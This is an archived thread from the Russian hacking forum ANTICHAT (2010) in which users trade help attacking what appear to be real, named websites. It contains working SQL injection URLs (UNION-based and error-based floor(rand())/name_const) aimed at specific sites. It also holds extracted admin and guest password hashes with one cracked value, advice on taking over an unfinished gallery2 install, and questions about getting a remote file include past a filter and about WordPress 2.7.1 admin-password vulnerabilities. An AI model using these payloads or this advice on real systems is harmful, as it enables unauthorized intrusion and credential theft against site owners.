ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

24.04.2010, 19:36
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
thanks как я недодумался....
|
|
|

24.04.2010, 22:34
|
|
Новичок
Регистрация: 29.03.2010
Сообщений: 4
Провел на форуме: 30475
Репутация:
2
|
|
WordPress 2.7.1
Имею ввиду уязвимость, позволяющая узнать пароль админа, сбросить его себе на ящик, подменить исполняемый код, SQL инъекция, узнать e-mail администратора?
Условие - регистрация закрыта, постинг запрещён, для рядового пользователя разрешены только комментарии.
|
|
|

25.04.2010, 11:42
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
На этом сайте достал такие hash
http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_use rName,g_hashedPassword)+from+g2_User+--+
guest:LajD09f455fd66378f12280bfd7894ce5b46
admin:kNaScfa395e30ad8195a4975c91eee51f33c
подбор
09f455fd66378f12280bfd7894ce5b46:LajD
В админку попасть не удается
http://slr-zone.com/shop/
Что можете еще посоветовать?
Заранее всем спасибо!
|
|
|

25.04.2010, 12:41
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме: 1535319
Репутация:
-16
|
|
Сообщение от YuNi|[c
народ прошу помоши в раскрутке через floor rand
вот версию и др инфо выводится норм но вот никак не могу выводит именя таблиц и колонок.
_http://www.le ve lst oc k.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select %20count(*),concat(version(),0x3a,floor(rand()*2)) x%20from%20(select%201%20union%20select%202)a%20gr oup%20by%20x%20limit%201)--
_http://www.le ve ls to ck.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select %20count(*),concat(database(),0x3a,floor(rand()*2) )x%20from%20(select%201%20union%20select%202)a%20g roup%20by%20x%20limit%201)--
может кто посоветует с правильным запросом для таблиц и колонок. Тут как только добавляю про information_schema.tables сразу ругается
esli tebya mysql version() toqda..
http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_con st(version(),1),name_const(version(),1))a)
|
|
|

25.04.2010, 14:25
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от FlaktW
На этом сайте достал такие hash
http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_use rName,g_hashedPassword)+from+g2_User+--+
guest:LajD09f455fd66378f12280bfd7894ce5b46
admin:kNaScfa395e30ad8195a4975c91eee51f33c
подбор
09f455fd66378f12280bfd7894ce5b46:LajD
В админку попасть не удается
http://slr-zone.com/shop/
Что можете еще посоветовать?
Заранее всем спасибо!
прозреваю, что это хеши от старой инсталляции gallery2, которая лежит в какой-то папке на серве.
http://slr-zone.com/shop/ - это неустановленная gallery2, можешь завершить инсталляцию, вписав свои данные и там видно будет.
|
|
|

25.04.2010, 16:04
|
|
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме: 1128838
Репутация:
36
|
|
подскажите что это?
Код:
http://www.hack0wn.com/view.php?xroot=271.0+order+by+1--&cat=exploits
есть ли тут уязвимость?
|
|
|

25.04.2010, 16:51
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
есть) хекеры там типо:
Код:
http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+&cat=exploits
|
|
|

25.04.2010, 17:14
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме: 1343031
Репутация:
184
|
|
Подскажите, возможно ли как-нибудь все-таки скормить урл для include($MEGA-VARIABLE.'file.php'), если перед этим он редактируется вот так:
preg_replace( "/[a-z]/i", "", $MEGA-VARIABLE);
Или без вариантов?
PS Можно айпи дать напрямую, но http съедается..
Последний раз редактировалось budden; 25.04.2010 в 17:27..
|
|
|

25.04.2010, 18:07
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
если FreeBsD криво настроенный - то можно содержимое папочек увидеть
|
|
|

25.04.2010, 18:51
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме: 264305
Репутация:
30
|
|
Сообщение от Pashkela
есть) хекеры там типо:
Код:
http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+&cat=exploits
а так такую уязвимость через тулзу раскрутить ?
сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось 
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|